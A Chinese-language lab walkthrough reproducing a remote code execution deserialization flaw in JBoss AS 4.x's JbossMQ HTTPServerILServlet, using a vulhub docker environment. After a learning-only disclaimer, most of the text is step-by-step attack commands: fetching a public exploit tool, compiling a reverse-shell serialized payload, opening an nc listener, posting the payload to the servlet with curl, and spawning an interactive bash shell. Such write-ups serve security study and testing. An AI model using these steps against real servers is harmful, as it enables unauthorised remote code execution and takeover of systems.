漏洞描述
声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
JBoss AS 4.x及之前版本中,JbossMQ实现过程的JMS over HTTP Invocation Layer的HTTPServerILServlet.java文件存在反序列化漏洞,远程攻击者可借助特制的序列化数据利用该漏洞执行任意代码。
影响版本
- JBoss AS 4.x及之前版本
环境搭建
docker搭建;
1 | https://github.com/vulhub/vulhub.git |
漏洞复现
1 | 环境 |
漏洞验证;
1 | http://XXX.XXX.XXX.XXX:8080/jbossmq-httpil/HTTPServerILServlet |
访问页面如下则可能存在有此漏洞:
反序列化利用工具;
1 | https://github.com/ianxtianxt/CVE-2015-7501/ |
在kail攻击机中解压CVE-2015-7501,并进入目录;
1 | unzip CVE-2015-7501-master.zip |
攻击机若没有Java环境,则需先安装Java环境;
1 | cd /opt |
反序列化利用工具反弹shell;
1 | javac -cp .:commons-collections-3.2.1.jar ReverseShellCommonsCollectionsHashMap.java |
攻击机中另起终端,执行:
1 | nc -lvvp 2333 |
这个时候在CVE-2015-7501-master/目录下生成了一个ReverseShellCommonsCollectionsHashMap.ser文件。
使用curl就能反弹shell,执行命令:
1 | curl http://192.168.240.140:8080/jbossmq-httpil/HTTPServerILServlet --data-binary @ReverseShellCommonsCollectionsHashMap.ser |
若返回的shell非正常交互,则执行:
1 | python -c 'import pty;pty.spawn("/bin/bash")' |